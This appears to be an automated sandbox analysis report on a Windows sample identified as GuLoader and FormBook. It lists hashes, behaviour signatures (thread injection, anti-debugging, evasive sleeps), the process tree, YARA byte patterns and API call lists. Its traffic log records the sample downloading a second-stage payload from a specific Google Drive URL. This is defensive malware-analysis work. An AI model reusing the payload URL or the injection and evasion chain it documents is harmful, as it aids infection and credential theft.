Windows Analysis Report
rResegregation.exe

Overview

General Information

Sample name: rResegregation.exe
Analysis ID: 1400163
MD5: b64f1f87fdc7e8bd3d053d058fc08f4e
SHA1: c3ef7dfe21793f4c98a0b98fa0d8e9b4a00a884c
SHA256: 92437485dda44372ed6d0baa2e1ff1593e0d43e5c6ef20918a393d83153a1a94
Infos:

Detection

FormBook, GuLoader
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • rResegregation.exe (PID: 2956 cmdline: C:\Users\user\Desktop\rResegregation.exe MD5: B64F1F87FDC7E8BD3D053D058FC08F4E)
    • rResegregation.exe (PID: 5024 cmdline: C:\Users\user\Desktop\rResegregation.exe MD5: B64F1F87FDC7E8BD3D053D058FC08F4E)
      • xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exe (PID: 4808 cmdline: "C:\Program Files (x86)\szoXoDzskkTxxhZpoRGYohtCWuXRRKBotonSSvXwdmZhRyVfAEJdGWdZEtpIlJlyetsE\xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winrshost.exe (PID: 3040 cmdline: C:\Windows\SysWOW64\winrshost.exe MD5: 9EB3371F7B80A434CC9F468B330A9928)
          • RAVCpl64.exe (PID: 7920 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
          • explorer.exe (PID: 5344 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2b370:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1538f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.28752832983.0000000005595000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x493f69:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x47df88:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        No Sigma rule has matched
        No Snort rule has matched

        AV Detection

        Source: rResegregation.exe | ReversingLabs: Detection: 44%
        Source: Yara match | File source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: rResegregation.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknown | HTTPS traffic detected: 172.217.12.142:443 -> 192.168.11.20:50222 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 142.250.72.225:443 -> 192.168.11.20:50223 version: TLS 1.2
        Source: rResegregation.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: winrshost.pdb source: rResegregation.exe, 00000002.00000002.28900231862.000000000758D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: wntdll.pdbUGP source: rResegregation.exe, 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28784367288.00000000375D4000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: rResegregation.exe, rResegregation.exe, 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28784367288.00000000375D4000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp, winrshost.exe
        Source: Binary string: mshtml.pdbUGP source: rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: winrshost.pdbGCTL source: rResegregation.exe, 00000002.00000002.28900231862.000000000758D000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_00406010 FindFirstFileA,FindClose,0_2_00406010
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_004055AE GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055AE
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
        Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /download?id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | DNS traffic detected: queries for: drive.google.com
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: rResegregation.exe, rResegregation.exe, 00000000.00000000.28284554839.0000000000409000.00000008.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000002.00000000.28610022706.0000000000409000.00000008.00000001.01000000.00000003.sdmp, winrshost.exe, 00000005.00000002.30433362648.0000000002EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: rResegregation.exe, 00000000.00000000.28284554839.0000000000409000.00000008.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000002.00000000.28610022706.0000000000409000.00000008.00000001.01000000.00000003.sdmp, winrshost.exe, 00000005.00000002.30433362648.0000000002EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: rResegregation.exe, 00000002.00000002.28900231862.0000000007530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: rResegregation.exe, 00000002.00000002.28912695963.0000000036B50000.00000004.00001000.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28900231862.0000000007569000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28900231862.0000000007530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46
        Source: rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/2
        Source: rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/9
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28782078129.0000000007573000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28900231862.000000000757B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1SbtsvuSmMXyyUeLoFIMNApYTw2G8r-46&export=download
        Source: rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50223
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50222
        Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_00405063 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405063

        E-Banking Fraud

        Source: Yara match | File source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F34E0 NtCreateMutant,LdrInitializeThunk,2_2_377F34E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_377F2D10
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_377F2B90
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F4570 NtSuspendThread,2_2_377F4570
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F4260 NtSetContextThread,2_2_377F4260
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2F30 NtOpenDirectoryObject,2_2_377F2F30
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2F00 NtCreateFile,2_2_377F2F00
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2FB0 NtSetValueKey,2_2_377F2FB0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2E50 NtCreateSection,2_2_377F2E50
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2E00 NtQueueApcThread,2_2_377F2E00
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2ED0 NtResumeThread,2_2_377F2ED0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2EC0 NtQuerySection,2_2_377F2EC0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2EB0 NtProtectVirtualMemory,2_2_377F2EB0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2E80 NtCreateProcessEx,2_2_377F2E80
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2D50 NtWriteVirtualMemory,2_2_377F2D50
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2DC0 NtAdjustPrivilegesToken,2_2_377F2DC0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2DA0 NtReadVirtualMemory,2_2_377F2DA0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2C50 NtUnmapViewOfSection,2_2_377F2C50
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F3C30 NtOpenProcessToken,2_2_377F3C30
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2C30 NtMapViewOfSection,2_2_377F2C30
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2C20 NtSetInformationFile,2_2_377F2C20
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2C10 NtOpenProcess,2_2_377F2C10
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2CF0 NtDelayExecution,2_2_377F2CF0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2CD0 NtEnumerateKey,2_2_377F2CD0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F3C90 NtOpenThread,2_2_377F3C90
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2B20 NtQueryInformationProcess,2_2_377F2B20
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2B10 NtAllocateVirtualMemory,2_2_377F2B10
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2B00 NtQueryValueKey,2_2_377F2B00
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2BE0 NtQueryVirtualMemory,2_2_377F2BE0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2BC0 NtQueryInformationToken,2_2_377F2BC0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2B80 NtCreateKey,2_2_377F2B80
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2A10 NtWriteFile,2_2_377F2A10
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2AC0 NtEnumerateValueKey,2_2_377F2AC0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2AA0 NtQueryInformationFile,2_2_377F2AA0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2A80 NtClose,2_2_377F2A80
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F29F0 NtReadFile,2_2_377F29F0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F29D0 NtWaitForSingleObject,2_2_377F29D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F38D0 NtGetContextThread,2_2_377F38D0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031134E0 NtCreateMutant,LdrInitializeThunk,5_2_031134E0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03112B10
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112B00 NtQueryValueKey,LdrInitializeThunk,5_2_03112B00
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03112B90
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112B80 NtCreateKey,LdrInitializeThunk,5_2_03112B80
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_03112BC0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112A80 NtClose,LdrInitializeThunk,5_2_03112A80
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031129F0 NtReadFile,LdrInitializeThunk,5_2_031129F0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112F00 NtCreateFile,LdrInitializeThunk,5_2_03112F00
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112E50 NtCreateSection,LdrInitializeThunk,5_2_03112E50
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_03112D10
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112C30 NtMapViewOfSection,LdrInitializeThunk,5_2_03112C30
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112CF0 NtDelayExecution,LdrInitializeThunk,5_2_03112CF0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03114260 NtSetContextThread,5_2_03114260
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03114570 NtSuspendThread,5_2_03114570
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112B20 NtQueryInformationProcess,5_2_03112B20
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112BE0 NtQueryVirtualMemory,5_2_03112BE0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112A10 NtWriteFile,5_2_03112A10
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112AA0 NtQueryInformationFile,5_2_03112AA0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112AC0 NtEnumerateValueKey,5_2_03112AC0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031129D0 NtWaitForSingleObject,5_2_031129D0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031138D0 NtGetContextThread,5_2_031138D0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112F30 NtOpenDirectoryObject,5_2_03112F30
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112FB0 NtSetValueKey,5_2_03112FB0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112E00 NtQueueApcThread,5_2_03112E00
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112E80 NtCreateProcessEx,5_2_03112E80
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112EB0 NtProtectVirtualMemory,5_2_03112EB0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112ED0 NtResumeThread,5_2_03112ED0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112EC0 NtQuerySection,5_2_03112EC0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112D50 NtWriteVirtualMemory,5_2_03112D50
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112DA0 NtReadVirtualMemory,5_2_03112DA0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112DC0 NtAdjustPrivilegesToken,5_2_03112DC0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112C10 NtOpenProcess,5_2_03112C10
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03113C30 NtOpenProcessToken,5_2_03113C30
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112C20 NtSetInformationFile,5_2_03112C20
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112C50 NtUnmapViewOfSection,5_2_03112C50
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03113C90 NtOpenThread,5_2_03113C90
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03112CD0 NtEnumerateKey,5_2_03112CD0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_004030EC EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030EC
        Source: C:\Users\user\Desktop\rResegregation.exe | File created: C:\Windows\resources\0409
        Source: C:\Users\user\Desktop\rResegregation.exe | File created: C:\Windows\hotdoggen.ini
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37876C692_2_37876C69
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37834BC02_2_37834BC0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377FDB192_2_377FDB19
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0B102_2_377C0B10
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787FB2E2_2_3787FB2E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787FA892_2_3787FA89
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787CA132_2_3787CA13
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787EA5B2_2_3787EA5B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DFAA02_2_377DFAA0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787E9A62_2_3787E9A6
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378059C02_2_378059C0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BE9A02_2_377BE9A0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C98702_2_377C9870
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DB8702_2_377DB870
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A68682_2_377A6868
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378398B22_2_378398B2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378718DA2_2_378718DA
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EE8102_2_377EE810
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378778F32_2_378778F3
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C38002_2_377C3800
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378608352_2_37860835
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C28C02_2_377C28C0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787F8722_2_3787F872
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D68822_2_377D6882
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030EE3105_2_030EE310
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319F3305_2_0319F330
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030D13805_2_030D1380
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319124C5_2_0319124C
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030CD2EC5_2_030CD2EC
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031A010E5_2_031A010E
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030CF1135_2_030CF113
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0317D1305_2_0317D130
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0312717A5_2_0312717A
